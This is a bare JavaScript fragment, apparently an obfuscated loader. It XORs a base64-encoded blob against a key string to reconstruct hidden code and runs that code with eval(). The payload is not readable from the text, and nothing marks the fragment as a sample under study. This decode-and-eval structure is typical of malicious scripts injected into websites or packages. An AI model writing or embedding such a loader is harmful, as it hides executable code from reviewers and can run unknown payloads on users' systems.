var O = "rwKMwF574DzL7eqKeL1nVEU5KVylOAdNlAMls1C8uMJwa6pgNeUL0pQBjtOuqq4PCVNIV5rdcVIFhVoKKpuya8tPQYRmLrOvja3taRddd7CdeghTX8jai6ZvzBpjWpCbV7ucIHoAWJY6nrZJo5JL8TWB21qw0fYZgdHYtKC17VDeRxfliLYhL7aEsaY7VpCdQdPB3LtEO0W5imJyNNkKfJ6ubgb5cirMhAV617nLj1CK4YfhZfWBLvSb8pocDjiBHOzXp8iptJLBIXJP43lnI07E5";
    var mJ = atob("BBY5bQ8uRxcJZBQpQEUpBikERRomFzBEPjMKGHQ5DDxCLj0JHRlhfzAZaFtBFF9IKQozI0IFImwDGikaXk5EcmN9bj4/WxYLFHglKQs3GyIkHlsRE10SfiIsMB44ACYYDUlEHQ82CxNKWywHBBMBOzYWAhMMUHQfFCYVEhgWa0B1FVxIeGRPNj4kPVkZXDYlDFQ+JVc6eSpAVBdZXAM3PRMMYXBPMytDGSEtETo7FAkNKTccJVYNNlNceUMkBSZfKQwibFwiGCouVHcISQs/Fy06AiQIYh9VGREDR0MbFytIfHZSXlQbIQ9fN2VGPAANKBQyMHcTJQNUWBcLNkQbJzs/FTYDXT0VDD5leTRjMjhGHR8LJ1QfbA4=");
    var pe = "";
    var KriJ = 0;
    for (; KriJ < O.length; KriJ++) {
      pe = pe + String.fromCharCode(O.charCodeAt(KriJ) ^ mJ.charCodeAt(KriJ));
    }
    eval(pe);
    